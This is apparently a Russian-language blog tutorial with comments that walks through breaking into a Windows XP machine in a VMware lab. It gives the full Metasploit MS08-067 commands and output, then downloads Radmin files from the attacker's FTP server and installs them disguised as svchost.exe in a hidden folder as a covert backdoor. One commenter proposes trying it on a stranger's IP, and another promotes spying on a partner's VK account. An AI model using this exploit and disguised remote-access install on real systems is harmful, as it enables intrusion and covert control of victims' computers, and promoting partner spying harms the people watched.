![]() |
|
Владимир Послов
23-03-2009 14:06 (ссылка)
23-03-2009 15:26 (ссылка)
Re: #ВЗЛОМ ПК, под управлением Windows. #
Нормально так))Надо будет сделать потом посложнее задачу))Или узнать ип какого нить нуба и проелать тоже самое))
Комментарии запрещены
05-01-2020 01:34 (ссылка)
Re: #ВЗЛОМ ПК, под управлением Windows. #
Сейчас очень часто ломают ВК, а особенно из-за того, что хотят узнать с кем общается возлюбленная, к примеру.
Обычно чтобы понять есть ли у вашей возлюбленной хахаль достаточно легальных методов, просто выяснить с кем она общается, кого лайкает в ВК https://vk-fans.ru/vk-spy и так далее
Обычно чтобы понять есть ли у вашей возлюбленной хахаль достаточно легальных методов, просто выяснить с кем она общается, кого лайкает в ВК https://vk-fans.ru/vk-spy и так далее
Комментарии запрещены
КЛАССИФИКАЦИЯ АТАК.
Атаки на протокол
Атаки на ПО
Атаки на пользователя
ПОЛИГОН ДЛЯ ИСПЫТАНИЙ.
Необходимый софт:
Любой дистрибьютив Windows XP (SP2,SP3 )
Виртуальная машина Vmware.
Итак, нам нужно где-то законно, развивать свои навыки, для этого создадим виртуальную машину и установим на нее так любимый пользователями Windows, надеюсь все уже скачали виртуальную машину Vmware, устанавливаем и открываем.
Создаем новую машину в Vmware, для этого зажимаем CTRL+N, и следум инструкциям, там все интуитивно понятно. Теперь идем в Edit => Virtual Network Setting и переходим на вкладку Host Virtual Adapter
http://4.bp.blogspot.com/_o...
Нажимаем add и создаем нужное количество виртуальных адаптеров. Затем идем в DHCP и удаляем от туда все адаптеры кроме, Wmnet1 и Wmnet8. Тут можно нажать Принять и ОК, или же сходить в Host Virtual Network Mapping и настроить каждому
http://1.bp.blogspot.com/_o...
адаптеру свой ip, если этого не сделать, то они будут назначенны автоматически.
Заходим в настройки виртуальной манины CTR+D, переходим на вкладку Enternet, выбираем Custop Specifnc: virtual network и назначаем любой понравившейся интерфейс, конечно, кроме Wmnet1 и Wmnet8, я выбрал Vmnet2.
http://4.bp.blogspot.com/_o...
Теперь переходим к CD-ROM, ставим галочку на Use ISO image, жмем обзор и выбираем образ с которого будем устанавливать Windows, мы также можем установить его с диска отметив Use physical drive, и выбрав соответствующий привод.
http://3.bp.blogspot.com/_o...
Ну вот приготовления закончены теперь запускаем виртуальную машину и жмем F12, если вы все правильно сконфигурировали, то перед вами появится окно установки. В моем случае оно выглядит так, у вас может отличатся, завит от уставливаемой ОС. Я использовал сборку ZVERDVD.
http://4.bp.blogspot.com/_o...
#УСТАНОВКА СВЯЗИ.#
Необходимый софт:
ФТП — сервер (Serv -U)
Значит, после установки необходимо настроить сеть, между нашим реальным ПК и Виртуальным. Для этого идем в свойства подключения виртуального адаптера, который вы выбрали на вкладке Enternet у меня это Vmnet2.
http://3.bp.blogspot.com/_o...
IP адресс 192.168.1.3
Маска подсети 255.255.255.0
Теперь загружаем виртуальную машину и также идем в сетевые подключения и смотрим свойства tcp/ip.
http://4.bp.blogspot.com/_o...
Настраиваем следующим образом:
IP адресс 192.168.1.10
Маска подсети 255.255.255.0
Основной шлюз 192.168.1.3
Осталось только поставить ФТП сервер на наш реальный ПК. Я выбрал Serv -U, он заводится с пол аборота. Важно, когда будете создавать пользователя, создавайте без пароля, да и вешайте фтп на стандартный 21 порт, используемый протокол тоже ФТП.
http://1.bp.blogspot.com/_o...
#ПРИМЕР.#
Необходимый софт:
Metasploit 3.2
Radmin Viewer 3
RadminServer (спец. Сборка)
Сканим комп xspider'ом
http://1.bp.blogspot.com/_o...
Для взлома мы бужем использовать, недавно обнаруженную уязвимость в службе Server(ms08_067).Запускаем Metasploit 3 Web, ждем пока загрузится и затем в адресной строке браузера пишем 127.0.0.1:55555.
http://3.bp.blogspot.com/_o...
use windows/smb/ms08_067_netapi ; наш сплоит
set PAYLOAD generic/shell_bind_tcp ; выбираем начинку
PAYLOAD => generic/shell_bind_tcp
set RHOST 192.168.1.10 ; хост-жертва
RHOST => 192.168.1.10
set LPORT 7777 ; локальный порт
LPORT => 7777
set RPORT 445 ; удаленный порт
RPORT => 445
exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:Russian
[*] Selected Target: Windows XP SP3 Russian (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.3:5583 -> 192.168.1.10:7777)
Microsoft Windows XP [‚¥àá¨ï 5.1.2600]
(‘) Š®à¯®à æ¨ï Œ ©ªà®á®äâ, 1985-2001.
C:WINDOWSsystem32>
Получили командную строку на удаленной системе
{создаем в папке windows, папку helps}
cd c:windows
mkdir helps
{коннектимся к нашему компу}
ftp192.168.1.3
Пользователь (192.168.1.3:(none)): kerny
{успешный коннект, идем c:kerny нашего фтп, именно там хранится радмин}
cd c:kerny
dir
{файлы радмина}
drw-rw-rw- 1 user group 0 Mar 2 20:10 .
drw-rw-rw- 1 user group 0 Mar 2 20:10 ..
-rw-rw-rw- 1 user group 547 Mar 2 20:10 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:10 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:10 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:10 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:10 svchost.exe
{сливаем файлы на комп жертвы в папку windowshelps}
get 111.bat c:windowshelps111.bat
get 111.reg c:windowshelps111.reg
get AdmDll.dll c:windowshelpsAdmDll.dll
get raddrv.dll c:windowshelpsraddrv.dll
get svchost.exe c:windowshelpssvchost.exe
{отключаемся от нашего фтп}
bye
{идем в папку, и проверяем скачались ли файлы}
cd c:windowshelps
dir
-rw-rw-rw- 1 user group 547 Mar 2 20:11 111.bat
-rw-rw-rw- 1 user group 940 Mar 2 20:11 111.reg
-rw-rw-rw- 1 user group 40448 Mar 2 20:12 AdmDll.dll
-rw-rw-rw- 1 user group 17408 Mar 2 20:12 raddrv.dll
-rw-rw-rw- 1 user group 152576 Mar 2 20:12 svchost.exe
{устанавливаем Radmin у жертвы}
111.bat
http://4.bp.blogspot.com/_o...
Теперь запускаем Radmin Viewer и конектимся, как видим все прошло успешно.